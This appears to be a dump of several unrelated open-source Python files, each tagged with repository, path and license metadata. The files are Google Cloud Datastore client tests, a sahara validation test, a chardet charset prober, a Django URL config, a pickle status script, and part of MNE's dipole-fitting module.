self.assertRaises(TypeError, client.key, KIND, ID, project=self.PROJECT)
def test_key_wo_project(self):
kind = "KIND"
id_ = 1234
creds = _make_credentials()
client = self._make_one(credentials=creds)
patch = mock.patch("google.cloud.datastore.client.Key", spec=["__call__"])
with patch as mock_klass:
key = client.key(kind, id_)
self.assertIs(key, mock_klass.return_value)
mock_klass.assert_called_once_with(
kind, id_, project=self.PROJECT, namespace=None
)
def test_key_w_namespace(self):
kind = "KIND"
id_ = 1234
namespace = object()
creds = _make_credentials()
client = self._make_one(namespace=namespace, credentials=creds)
patch = mock.patch("google.cloud.datastore.client.Key", spec=["__call__"])
with patch as mock_klass:
key = client.key(kind, id_)
self.assertIs(key, mock_klass.return_value)
mock_klass.assert_called_once_with(
kind, id_, project=self.PROJECT, namespace=namespace
)
def test_key_w_namespace_collision(self):
kind = "KIND"
id_ = 1234
namespace1 = object()
namespace2 = object()
creds = _make_credentials()
client = self._make_one(namespace=namespace1, credentials=creds)
patch = mock.patch("google.cloud.datastore.client.Key", spec=["__call__"])
with patch as mock_klass:
key = client.key(kind, id_, namespace=namespace2)
self.assertIs(key, mock_klass.return_value)
mock_klass.assert_called_once_with(
kind, id_, project=self.PROJECT, namespace=namespace2
)
def test_batch(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
patch = mock.patch("google.cloud.datastore.client.Batch", spec=["__call__"])
with patch as mock_klass:
batch = client.batch()
self.assertIs(batch, mock_klass.return_value)
mock_klass.assert_called_once_with(client)
def test_transaction_defaults(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
patch = mock.patch(
"google.cloud.datastore.client.Transaction", spec=["__call__"]
)
with patch as mock_klass:
xact = client.transaction()
self.assertIs(xact, mock_klass.return_value)
mock_klass.assert_called_once_with(client)
def test_read_only_transaction_defaults(self):
from google.cloud.datastore_v1.types import TransactionOptions
creds = _make_credentials()
client = self._make_one(credentials=creds)
xact = client.transaction(read_only=True)
self.assertEqual(
xact._options, TransactionOptions(read_only=TransactionOptions.ReadOnly())
)
self.assertFalse(xact._options.HasField("read_write"))
self.assertTrue(xact._options.HasField("read_only"))
self.assertEqual(xact._options.read_only, TransactionOptions.ReadOnly())
def test_query_w_client(self):
KIND = "KIND"
creds = _make_credentials()
client = self._make_one(credentials=creds)
other = self._make_one(credentials=_make_credentials())
self.assertRaises(TypeError, client.query, kind=KIND, client=other)
def test_query_w_project(self):
KIND = "KIND"
creds = _make_credentials()
client = self._make_one(credentials=creds)
self.assertRaises(TypeError, client.query, kind=KIND, project=self.PROJECT)
def test_query_w_defaults(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
patch = mock.patch("google.cloud.datastore.client.Query", spec=["__call__"])
with patch as mock_klass:
query = client.query()
self.assertIs(query, mock_klass.return_value)
mock_klass.assert_called_once_with(
client, project=self.PROJECT, namespace=None
)
def test_query_explicit(self):
kind = "KIND"
namespace = "NAMESPACE"
ancestor = object()
filters = [("PROPERTY", "==", "VALUE")]
projection = ["__key__"]
order = ["PROPERTY"]
distinct_on = ["DISTINCT_ON"]
creds = _make_credentials()
client = self._make_one(credentials=creds)
patch = mock.patch("google.cloud.datastore.client.Query", spec=["__call__"])
with patch as mock_klass:
query = client.query(
kind=kind,
namespace=namespace,
ancestor=ancestor,
filters=filters,
projection=projection,
order=order,
distinct_on=distinct_on,
)
self.assertIs(query, mock_klass.return_value)
mock_klass.assert_called_once_with(
client,
project=self.PROJECT,
kind=kind,
namespace=namespace,
ancestor=ancestor,
filters=filters,
projection=projection,
order=order,
distinct_on=distinct_on,
)
def test_query_w_namespace(self):
kind = "KIND"
namespace = object()
creds = _make_credentials()
client = self._make_one(namespace=namespace, credentials=creds)
patch = mock.patch("google.cloud.datastore.client.Query", spec=["__call__"])
with patch as mock_klass:
query = client.query(kind=kind)
self.assertIs(query, mock_klass.return_value)
mock_klass.assert_called_once_with(
client, project=self.PROJECT, namespace=namespace, kind=kind
)
def test_query_w_namespace_collision(self):
kind = "KIND"
namespace1 = object()
namespace2 = object()
creds = _make_credentials()
client = self._make_one(namespace=namespace1, credentials=creds)
patch = mock.patch("google.cloud.datastore.client.Query", spec=["__call__"])
with patch as mock_klass:
query = client.query(kind=kind, namespace=namespace2)
self.assertIs(query, mock_klass.return_value)
mock_klass.assert_called_once_with(
client, project=self.PROJECT, namespace=namespace2, kind=kind
)
class _NoCommitBatch(object):
def __init__(self, client):
from google.cloud.datastore.batch import Batch
self._client = client
self._batch = Batch(client)
self._batch.begin()
def __enter__(self):
self._client._push_batch(self._batch)
return self._batch
def __exit__(self, *args):
self._client._pop_batch()
class _NoCommitTransaction(object):
def __init__(self, client, transaction_id="TRANSACTION"):
from google.cloud.datastore.batch import Batch
from google.cloud.datastore.transaction import Transaction
self._client = client
xact = self._transaction = Transaction(client)
xact._id = transaction_id
Batch.begin(xact)
def __enter__(self):
self._client._push_batch(self._transaction)
return self._transaction
def __exit__(self, *args):
self._client._pop_batch()
class _Entity(dict):
key = None
exclude_from_indexes = ()
_meanings = {}
class _Key(object):
_MARKER = object()
_kind = "KIND"
_key = "KEY"
_path = None
_id = 1234
_stored = None
def __init__(self, project):
self.project = project
@property
def is_partial(self):
return self._id is None
def to_protobuf(self):
from google.cloud.datastore_v1.proto import entity_pb2
key = self._key = entity_pb2.Key()
# Don't assign it, because it will just get ripped out
# key.partition_id.project_id = self.project
element = key.path.add()
element.kind = self._kind
if self._id is not None:
element.id = self._id
return key
def completed_key(self, new_id):
assert self.is_partial
new_key = self.__class__(self.project)
new_key._id = new_id
return new_key
class _PathElementPB(object):
def __init__(self, id_):
self.id = id_
class _KeyPB(object):
def __init__(self, id_):
self.path = [_PathElementPB(id_)]
def _assert_num_mutations(test_case, mutation_pb_list, num_mutations):
test_case.assertEqual(len(mutation_pb_list), num_mutations)
def _mutated_pb(test_case, mutation_pb_list, mutation_type):
# Make sure there is only one mutation.
_assert_num_mutations(test_case, mutation_pb_list, 1)
# We grab the only mutation.
mutated_pb = mutation_pb_list[0]
# Then check if it is the correct type.
test_case.assertEqual(mutated_pb.WhichOneof("operation"), mutation_type)
return getattr(mutated_pb, mutation_type)
def _make_key(id_):
from google.cloud.datastore_v1.proto import entity_pb2
key = entity_pb2.Key()
elem = key.path.add()
elem.id = id_
return key
def _make_commit_response(*keys):
from google.cloud.datastore_v1.proto import datastore_pb2
mutation_results = [datastore_pb2.MutationResult(key=key) for key in keys]
return datastore_pb2.CommitResponse(mutation_results=mutation_results)
def _make_lookup_response(results=(), missing=(), deferred=()):
entity_results_found = [
mock.Mock(entity=result, spec=["entity"]) for result in results
]
entity_results_missing = [
mock.Mock(entity=missing_entity, spec=["entity"]) for missing_entity in missing
]
return mock.Mock(
found=entity_results_found,
missing=entity_results_missing,
deferred=deferred,
spec=["found", "missing", "deferred"],
)
def _make_datastore_api(*keys, **kwargs):
commit_method = mock.Mock(return_value=_make_commit_response(*keys), spec=[])
lookup_response = kwargs.pop("lookup_response", _make_lookup_response())
lookup_method = mock.Mock(return_value=lookup_response, spec=[])
return mock.Mock(
commit=commit_method, lookup=lookup_method, spec=["commit", "lookup"]
)
|
tseaver/google-cloud-python
|
datastore/tests/unit/test_client.py
|
Python
|
apache-2.0
| 44,363
| 0.000654
|
#!/usr/bin/env python
import pickle
import argparse
from pprint import pprint
description = """
print out run status from pickled Location object
"""
parser = argparse.ArgumentParser(description=description)
parser.add_argument('pickle', type=argparse.FileType('r'), help='path to location pickle')
args = parser.parse_args()
l = pickle.load(args.pickle)
pprint(l)
|
sostenibilidad-unam/sleuth_automation
|
bin/status.py
|
Python
|
gpl-3.0
| 373
| 0.005362
|
# Copyright (c) 2013 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
import mock
import six
from sahara.service.validations.edp import job_executor as je
from sahara.tests.unit.service.validation import utils as u
from sahara.utils import edp
def wrap_it(data):
je.check_job_executor(data, 0)
class FakeJob(object):
type = edp.JOB_TYPE_JAVA
libs = []
class TestJobExecJavaValidation(u.ValidationTestCase):
def setUp(self):
super(TestJobExecJavaValidation, self).setUp()
self._create_object_fun = wrap_it
self.scheme = je.JOB_EXEC_SCHEMA
@mock.patch('sahara.service.validations.base.check_edp_job_support')
@mock.patch('sahara.service.validations.base.check_cluster_exists')
@mock.patch('sahara.service.edp.api.get_job')
def test_java(self, get_job, check_cluster, check_oozie):
check_cluster.return_value = True
check_oozie.return_value = None
get_job.return_value = FakeJob()
self._assert_create_object_validation(
data={
"cluster_id": six.text_type(uuid.uuid4()),
"job_configs": {"configs": {},
"params": {},
"args": []}
},
bad_req_i=(1, "INVALID_DATA",
"Java job must "
"specify edp.java.main_class"))
self._assert_create_object_validation(
data={
"cluster_id": six.text_type(uuid.uuid4()),
"job_configs": {
"configs": {
"edp.java.main_class": "org.me.myclass"},
"params": {},
"args": []}
})
|
tellesnobrega/storm_plugin
|
sahara/tests/unit/service/validation/edp/test_job_executor_java.py
|
Python
|
apache-2.0
| 2,252
| 0
|
# ####################### BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
# Proofpoint, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
class MultiByteCharSetProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mDistributionAnalyzer = None
self._mCodingSM = None
self._mLastChar = [0, 0]
def reset(self):
CharSetProber.reset(self)
if self._mCodingSM:
self._mCodingSM.reset()
if self._mDistributionAnalyzer:
self._mDistributionAnalyzer.reset()
self._mLastChar = [0, 0]
def get_charset_name(self):
pass
def feed(self, aBuf):
aLen = len(aBuf)
for i in range(0, aLen):
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if (self._mDistributionAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
return self._mDistributionAnalyzer.get_confidence()
|
insiderr/insiderr-app
|
app/modules/requests/packages/chardet/mbcharsetprober.py
|
Python
|
gpl-3.0
| 3,269
| 0.000306
|
from django.conf.urls import url
from . import views
app_name = 'revisions'
urlpatterns = [
url(r'^revision/$', views.RevisionView.as_view(), name = 'revision'),
url(r'^mail/$', views.MailView.as_view(), name = 'mail'),
]
|
pelgoros/kwyjibo
|
revisions/urls.py
|
Python
|
gpl-3.0
| 232
| 0.017241
|
# -*- coding: utf-8 -*-
"""Single-dipole functions and classes."""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Eric Larson <larson.eric.d@gmail.com>
#
# License: Simplified BSD
from copy import deepcopy
import functools
from functools import partial
import re
import numpy as np
from .cov import read_cov, compute_whitener
from .io.constants import FIFF
from .io.pick import pick_types
from .io.proj import make_projector, _needs_eeg_average_ref_proj
from .bem import _fit_sphere
from .evoked import _read_evoked, _aspect_rev, _write_evokeds
from .transforms import _print_coord_trans, _coord_frame_name, apply_trans
from .viz.evoked import _plot_evoked
from .forward._make_forward import (_get_trans, _setup_bem,
_prep_meg_channels, _prep_eeg_channels)
from .forward._compute_forward import (_compute_forwards_meeg,
_prep_field_computation)
from .surface import (transform_surface_to, _compute_nearest,
_points_outside_surface)
from .bem import _bem_find_surface, _bem_surf_name
from .source_space import _make_volume_source_space, SourceSpaces, head_to_mni
from .parallel import parallel_func
from .utils import (logger, verbose, _time_mask, warn, _check_fname,
check_fname, _pl, fill_doc, _check_option, ShiftTimeMixin,
_svd_lwork, _repeated_svd, _get_blas_funcs)
@fill_doc
class Dipole(object):
u"""Dipole class for sequential dipole fits.
.. note:: This class should usually not be instantiated directly,
instead :func:`mne.read_dipole` should be used.
Used to store positions, orientations, amplitudes, times, goodness of fit
of dipoles, typically obtained with Neuromag/xfit, mne_dipole_fit
or certain inverse solvers. Note that dipole position vectors are given in
the head coordinate frame.
Parameters
----------
times : array, shape (n_dipoles,)
The time instants at which each dipole was fitted (sec).
pos : array, shape (n_dipoles, 3)
The dipoles positions (m) in head coordinates.
amplitude : array, shape (n_dipoles,)
The amplitude of the dipoles (Am).
ori : array, shape (n_dipoles, 3)
The dipole orientations (normalized to unit length).
gof : array, shape (n_dipoles,)
The goodness of fit.
name : str | None
Name of the dipole.
conf : dict
Confidence limits in dipole orientation for "vol" in m^3 (volume),
"depth" in m (along the depth axis), "long" in m (longitudinal axis),
"trans" in m (transverse axis), "qlong" in Am, and "qtrans" in Am
(currents). The current confidence limit in the depth direction is
assumed to be zero (although it can be non-zero when a BEM is used).
.. versionadded:: 0.15
khi2 : array, shape (n_dipoles,)
The χ^2 values for the fits.
.. versionadded:: 0.15
nfree : array, shape (n_dipoles,)
The number of free parameters for each fit.
.. versionadded:: 0.15
%(verbose)s
See Also
--------
fit_dipole
DipoleFixed
read_dipole
Notes
-----
This class is for sequential dipole fits, where the position
changes as a function of time. For fixed dipole fits, where the
position is fixed as a function of time, use :class:`mne.DipoleFixed`.
"""
@verbose
def __init__(self, times, pos, amplitude, ori, gof,
name=None, conf=None, khi2=None, nfree=None,
verbose=None): # noqa: D102
self.times = np.array(times)
self.pos = np.array(pos)
self.amplitude = np.array(amplitude)
self.ori = np.array(ori)
self.gof = np.array(gof)
self.name = name
self.conf = dict()
if conf is not None:
for key, value in conf.items():
self.conf[key] = np.array(value)
self.khi2 = np.array(khi2) if khi2 is not None else None
self.nfree = np.array(nfree) if nfree is not None else None
self.verbose = verbose
def __repr__(self): # noqa: D105
s = "n_times : %s" % len(self.times)
s += ", tmin : %0.3f" % np.min(self.times)
s += ", tmax : %0.3f" % np.max(self.times)
return "<Dipole | %s>" % s
@verbose
def save(self, fname, overwrite=False, *, verbose=None):
"""Save dipole in a .dip or .bdip file.
Parameters
----------
fname : str
The name of the .dip or .bdip file.
%(overwrite)s
.. versionadded:: 0.20
%(verbose_meth)s
Notes
-----
.. versionchanged:: 0.20
Support for writing bdip (Xfit binary) files.
"""
# obligatory fields
fname = _check_fname(fname, overwrite=overwrite)
if fname.endswith('.bdip'):
_write_dipole_bdip(fname, self)
else:
_write_dipole_text(fname, self)
@fill_doc
def crop(self, tmin=None, tmax=None, include_tmax=True):
"""Crop data to a given time interval.
Parameters
----------
tmin : float | None
Start time of selection in seconds.
tmax : float | None
End time of selection in seconds.
%(include_tmax)s
Returns
-------
self : instance of Dipole
The cropped instance.
"""
sfreq = None
if len(self.times) > 1:
sfreq = 1. / np.median(np.diff(self.times))
mask = _time_mask(self.times, tmin, tmax, sfreq=sfreq,
include_tmax=include_tmax)
for attr in ('times', 'pos', 'gof', 'amplitude', 'ori',
'khi2', 'nfree'):
if getattr(self, attr) is not None:
setattr(self, attr, getattr(self, attr)[mask])
for key in self.conf.keys():
self.conf[key] = self.conf[key][mask]
return self
def copy(self):
"""Copy the Dipoles object.
Returns
-------
dip : instance of Dipole
The copied dipole instance.
"""
return deepcopy(self)
@verbose
def plot_locations(self, trans, subject, subjects_dir=None,
mode='orthoview', coord_frame='mri', idx='gof',
show_all=True, ax=None, block=False, show=True,
scale=5e-3, color=(1.0, 0.0, 0.0), fig=None,
verbose=None, title=None):
"""Plot dipole locations in 3d.
Parameters
----------
trans : dict
The mri to head trans.
subject : str
The subject name corresponding to FreeSurfer environment
variable SUBJECT.
%(subjects_dir)s
mode : str
Can be ``'arrow'``, ``'sphere'`` or ``'orthoview'``.
.. versionadded:: 0.14.0
coord_frame : str
Coordinate frame to use, 'head' or 'mri'. Defaults to 'mri'.
.. versionadded:: 0.14.0
idx : int | 'gof' | 'amplitude'
Index of the initially plotted dipole. Can also be 'gof' to plot
the dipole with highest goodness of fit value or 'amplitude' to
plot the dipole with the highest amplitude. The dipoles can also be
browsed through using up/down arrow keys or mouse scroll. Defaults
to 'gof'. Only used if mode equals 'orthoview'.
.. versionadded:: 0.14.0
show_all : bool
Whether to always plot all the dipoles. If True (default), the
active dipole is plotted as a red dot and it's location determines
the shown MRI slices. The the non-active dipoles are plotted as
small blue dots. If False, only the active dipole is plotted.
Only used if mode equals 'orthoview'.
.. versionadded:: 0.14.0
ax : instance of matplotlib Axes3D | None
Axes to plot into. If None (default), axes will be created.
Only used if mode equals 'orthoview'.
.. versionadded:: 0.14.0
block : bool
Whether to halt program execution until the figure is closed.
Defaults to False. Only used if mode equals 'orthoview'.
.. versionadded:: 0.14.0
show : bool
Show figure if True. Defaults to True.
Only used if mode equals 'orthoview'.
scale : float
The scale of the dipoles if ``mode`` is 'arrow' or 'sphere'.
color : tuple
The color of the dipoles if ``mode`` is 'arrow' or 'sphere'.
fig : mayavi.mlab.Figure | None
Mayavi Scene in which to plot the alignment.
If ``None``, creates a new 600x600 pixel figure with black
background.
.. versionadded:: 0.14.0
%(verbose_meth)s
%(dipole_locs_fig_title)s
.. versionadded:: 0.21.0
Returns
-------
fig : instance of mayavi.mlab.Figure or matplotlib.figure.Figure
The mayavi figure or matplotlib Figure.
Notes
-----
.. versionadded:: 0.9.0
"""
_check_option('mode', mode, [None, 'arrow', 'sphere', 'orthoview'])
from .viz import plot_dipole_locations
return plot_dipole_locations(
self, trans, subject, subjects_dir, mode, coord_frame, idx,
show_all, ax, block, show, scale=scale, color=color, fig=fig,
title=title)
@verbose
def to_mni(self, subject, trans, subjects_dir=None,
verbose=None):
"""Convert dipole location from head coordinate system to MNI coordinates.
Parameters
----------
%(subject)s
%(trans_not_none)s
%(subjects_dir)s
%(verbose)s
Returns
-------
pos_mni : array, shape (n_pos, 3)
The MNI coordinates (in mm) of pos.
"""
mri_head_t, trans = _get_trans(trans)
return head_to_mni(self.pos, subject, mri_head_t,
subjects_dir=subjects_dir, verbose=verbose)
def plot_amplitudes(self, color='k', show=True):
"""Plot the dipole amplitudes as a function of time.
Parameters
----------
color : matplotlib color
Color to use for the trace.
show : bool
Show figure if True.
Returns
-------
fig : matplotlib.figure.Figure
The figure object containing the plot.
"""
from .viz import plot_dipole_amplitudes
return plot_dipole_amplitudes([self], [color], show)
def __getitem__(self, item):
"""Get a time slice.
Parameters
----------
item : array-like or slice
The slice of time points to use.
Returns
-------
dip : instance of Dipole
The sliced dipole.
"""
if isinstance(item, int): # make sure attributes stay 2d
item = [item]
selected_times = self.times[item].copy()
selected_pos = self.pos[item, :].copy()
selected_amplitude = self.amplitude[item].copy()
selected_ori = self.ori[item, :].copy()
selected_gof = self.gof[item].copy()
selected_name = self.name
selected_conf = dict()
for key in self.conf.keys():
selected_conf[key] = self.conf[key][item]
selected_khi2 = self.khi2[item] if self.khi2 is not None else None
selected_nfree = self.nfree[item] if self.nfree is not None else None
return Dipole(
selected_times, selected_pos, selected_amplitude, selected_ori,
selected_gof, selected_name, selected_conf, selected_khi2,
selected_nfree)
def __len__(self):
"""Return the number of dipoles.
Returns
-------
len : int
The number of dipoles.
Examples
--------
This can be used as::
>>> len(dipoles) # doctest: +SKIP
10
"""
return self.pos.shape[0]
def _read_dipole_fixed(fname):
"""Read a fixed dipole FIF file."""
logger.info('Reading %s ...' % fname)
info, nave, aspect_kind, comment, times, data, _ = _read_evoked(fname)
return DipoleFixed(info, data, times, nave, aspect_kind, comment=comment)
@fill_doc
class DipoleFixed(ShiftTimeMixin):
"""Dipole class for fixed-position dipole fits.
.. note:: This class should usually not be instantiated directly,
instead :func:`mne.read_dipole` should be used.
Parameters
----------
info : instance of Info
The measurement info.
data : array, shape (n_channels, n_times)
The dipole data.
times : array, shape (n_times,)
The time points.
nave : int
Number of averages.
aspect_kind : int
The kind of data.
comment : str
The dipole comment.
%(verbose)s
See Also
--------
read_dipole
Dipole
fit_dipole
Notes
-----
This class is for fixed-position dipole fits, where the position
(and maybe orientation) is static over time. For sequential dipole fits,
where the position can change a function of time, use :class:`mne.Dipole`.
.. versionadded:: 0.12
"""
@verbose
def __init__(self, info, data, times, nave, aspect_kind,
comment='', verbose=None): # noqa: D102
self.info = info
self.nave = nave
self._aspect_kind = aspect_kind
self.kind = _aspect_rev.get(aspect_kind, 'unknown')
self.comment = comment
self.times = times
self.data = data
self.verbose = verbose
self.preload = True
self._update_first_last()
def __repr__(self): # noqa: D105
s = "n_times : %s" % len(self.times)
s += ", tmin : %s" % np.min(self.times)
s += ", tmax : %s" % np.max(self.times)
return "<DipoleFixed | %s>" % s
def copy(self):
"""Copy the DipoleFixed object.
Returns
-------
inst : instance of DipoleFixed
The copy.
Notes
-----
.. versionadded:: 0.16
"""
return deepcopy(self)
@property
def ch_names(self):
"""Channel names."""
return self.info['ch_names']
@verbose
def save(self, fname, verbose=None):
"""Save dipole in a .fif file.
Parameters
----------
fname : str
The name of the .fif file. Must end with ``'.fif'`` or
``'.fif.gz'`` to make it explicit that the file contains
dipole information in FIF format.
%(verbose_meth)s
"""
check_fname(fname, 'DipoleFixed', ('-dip.fif', '-dip.fif.gz',
'_dip.fif', '_dip.fif.gz',),
('.fif', '.fif.gz'))
_write_evokeds(fname, self, check=False)
def plot(self, show=True, time_unit='s'):
"""Plot dipole data.
Parameters
----------
show : bool
Call pyplot.show() at the end or not.
time_unit : str
The units for the time axis, can be "ms" or "s" (default).
.. versionadded:: 0.16
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure containing the time courses.
"""
return _plot_evoked(self, picks=None, exclude=(), unit=True, show=show,
ylim=None, xlim='tight', proj=False, hline=None,
units=None, scalings=None, titles=None, axes=None,
gfp=False, window_title=None, spatial_colors=False,
plot_type="butterfly", selectable=False,
time_unit=time_unit)
# #############################################################################
# IO
@verbose
def read_dipole(fname, verbose=None):
"""Read .dip file from Neuromag/xfit or MNE.
Parameters
----------
fname : str
The name of the .dip or .fif file.
%(verbose)s
Returns
-------
dipole : instance of Dipole or DipoleFixed
The dipole.
See Also
--------
Dipole
DipoleFixed
fit_dipole
Notes
-----
.. versionchanged:: 0.20
Support for reading bdip (Xfit binary) format.
"""
fname = _check_fname(fname, overwrite='read', must_exist=True)
if fname.endswith('.fif') or fname.endswith('.fif.gz'):
return _read_dipole_fixed(fname)
elif fname.endswith('.bdip'):
return _read_dipole_bdip(fname)
else:
return _read_dipole_text(fname)
def _read_dipole_text(fname):
"""Read a dipole text file."""
# Figure out the special fields
need_header = True
def_line = name = None
# There is a bug in older np.loadtxt regarding skipping fields,
# so just read the data ourselves (need to get name and header anyway)
data = list()
with open(fname, 'r') as fid:
for line in fid:
if not (line.startswith('%') or line.startswith('#')):
need_header = False
data.append(line.strip().split())
else:
if need_header:
def_line = line
if line.startswith('##') or line.startswith('%%'):
m = re.search('Name "(.*) dipoles"', line)
if m:
name = m.group(1)
del line
data = np.atleast_2d(np.array(data, float))
if def_line is None:
raise IOError('Dipole text file is missing field definition '
'comment, cannot parse %s' % (fname,))
# actually parse the fields
def_line = def_line.lstrip('%').lstrip('#').strip()
# MNE writes it out differently than Elekta, let's standardize them...
fields = re.sub(r'([X|Y|Z] )\(mm\)', # "X (mm)", etc.
lambda match: match.group(1).strip() + '/mm', def_line)
fields = re.sub(r'\((.*?)\)', # "Q(nAm)", etc.
lambda match: '/' + match.group(1), fields)
fields = re.sub('(begin|end) ', # "begin" and "end" with no units
lambda match: match.group(1) + '/ms', fields)
fields = fields.lower().split()
required_fields = ('begin/ms',
'x/mm', 'y/mm', 'z/mm',
'q/nam', 'qx/nam', 'qy/nam', 'qz/nam',
'g/%')
optional_fields = ('khi^2', 'free', # standard ones
# now the confidence fields (up to 5!)
'vol/mm^3', 'depth/mm', 'long/mm', 'trans/mm',
'qlong/nam', 'qtrans/nam')
conf_scales = [1e-9, 1e-3, 1e-3, 1e-3, 1e-9, 1e-9]
missing_fields = sorted(set(required_fields) - set(fields))
if len(missing_fields) > 0:
raise RuntimeError('Could not find necessary fields in header: %s'
% (missing_fields,))
handled_fields = set(required_fields) | set(optional_fields)
assert len(handled_fields) == len(required_fields) + len(optional_fields)
ignored_fields = sorted(set(fields) -
set(handled_fields) -
{'end/ms'})
if len(ignored_fields) > 0:
warn('Ignoring extra fields in dipole file: %s' % (ignored_fields,))
if len(fields) != data.shape[1]:
raise IOError('More data fields (%s) found than data columns (%s): %s'
% (len(fields), data.shape[1], fields))
logger.info("%d dipole(s) found" % len(data))
if 'end/ms' in fields:
if np.diff(data[:, [fields.index('begin/ms'),
fields.index('end/ms')]], 1, -1).any():
warn('begin and end fields differed, but only begin will be used '
'to store time values')
# Find the correct column in our data array, then scale to proper units
idx = [fields.index(field) for field in required_fields]
assert len(idx) >= 9
times = data[:, idx[0]] / 1000.
pos = 1e-3 * data[:, idx[1:4]] # put data in meters
amplitude = data[:, idx[4]]
norm = amplitude.copy()
amplitude /= 1e9
norm[norm == 0] = 1
ori = data[:, idx[5:8]] / norm[:, np.newaxis]
gof = data[:, idx[8]]
# Deal with optional fields
optional = [None] * 2
for fi, field in enumerate(optional_fields[:2]):
if field in fields:
optional[fi] = data[:, fields.index(field)]
khi2, nfree = optional
conf = dict()
for field, scale in zip(optional_fields[2:], conf_scales): # confidence
if field in fields:
conf[field.split('/')[0]] = scale * data[:, fields.index(field)]
return Dipole(times, pos, amplitude, ori, gof, name, conf, khi2, nfree)
def _write_dipole_text(fname, dip):
fmt = ' %7.1f %7.1f %8.2f %8.2f %8.2f %8.3f %8.3f %8.3f %8.3f %6.2f'
header = ('# begin end X (mm) Y (mm) Z (mm)'
' Q(nAm) Qx(nAm) Qy(nAm) Qz(nAm) g/%')
t = dip.times[:, np.newaxis] * 1000.
gof = dip.gof[:, np.newaxis]
amp = 1e9 * dip.amplitude[:, np.newaxis]
out = (t, t, dip.pos / 1e-3, amp, dip.ori * amp, gof)
# optional fields
fmts = dict(khi2=(' khi^2', ' %8.1f', 1.),
nfree=(' free', ' %5d', 1),
vol=(' vol/mm^3', ' %9.3f', 1e9),
depth=(' depth/mm', ' %9.3f', 1e3),
long=(' long/mm', ' %8.3f', 1e3),
trans=(' trans/mm', ' %9.3f', 1e3),
qlong=(' Qlong/nAm', ' %10.3f', 1e9),
qtrans=(' Qtrans/nAm', ' %11.3f', 1e9),
)
for key in ('khi2', 'nfree'):
data = getattr(dip, key)
if data is not None:
header += fmts[key][0]
fmt += fmts[key][1]
out += (data[:, np.newaxis] * fmts[key][2],)
for key in ('vol', 'depth', 'long', 'trans', 'qlong', 'qtrans'):
data = dip.conf.get(key)
if data is not None:
header += fmts[key][0]
fmt += fmts[key][1]
out += (data[:, np.newaxis] * fmts[key][2],)
out = np.concatenate(out, axis=-1)
# NB CoordinateSystem is hard-coded as Head here
with open(fname, 'wb') as fid:
fid.write('# CoordinateSystem "Head"\n'.encode('utf-8'))
fid.write((header + '\n').encode('utf-8'))
np.savetxt(fid, out, fmt=fmt)
if dip.name is not None:
fid.write(('## Name "%s dipoles" Style "Dipoles"'
% dip.name).encode('utf-8'))
_BDIP_ERROR_KEYS = ('depth', 'long', 'trans', 'qlong', 'qtrans')
def _read_dipole_bdip(fname):
name = None
nfree = None
with open(fname, 'rb') as fid:
# Which dipole in a multi-dipole set
times = list()
pos = list()
amplitude = list()
ori = list()
gof = list()
conf = dict(vol=list())
khi2 = list()
has_errors = None
while True:
num = np.frombuffer(fid.read(4), '>i4')
if len(num) == 0:
break
times.append(np.frombuffer(fid.read(4), '>f4')[0])
fid.read(4) # end
fid.read(12) # r0
pos.append(np.frombuffer(fid.read(12), '>f4'))
Q = np.frombuffer(fid.read(12), '>f4')
amplitude.append(np.linalg.norm(Q))
ori.append(Q / amplitude[-1])
gof.append(100 * np.frombuffer(fid.read(4), '>f4')[0])
this_has_errors = bool(np.frombuffer(fid.read(4), '>i4')[0])
if has_errors is None:
has_errors = this_has_errors
for key in _BDIP_ERROR_KEYS:
conf[key] = list()
assert has_errors == this_has_errors
fid.read(4) # Noise level used for error computations
limits = np.frombuffer(fid.read(20), '>f4') # error limits
for key, lim in zip(_BDIP_ERROR_KEYS, limits):
conf[key].append(lim)
fid.read(100) # (5, 5) fully describes the conf. ellipsoid
conf['vol'].append(np.frombuffer(fid.read(4), '>f4')[0])
khi2.append(np.frombuffer(fid.read(4), '>f4')[0])
fid.read(4) # prob
fid.read(4) # total noise estimate
return Dipole(times, pos, amplitude, ori, gof, name, conf, khi2, nfree)
def _write_dipole_bdip(fname, dip):
with open(fname, 'wb+') as fid:
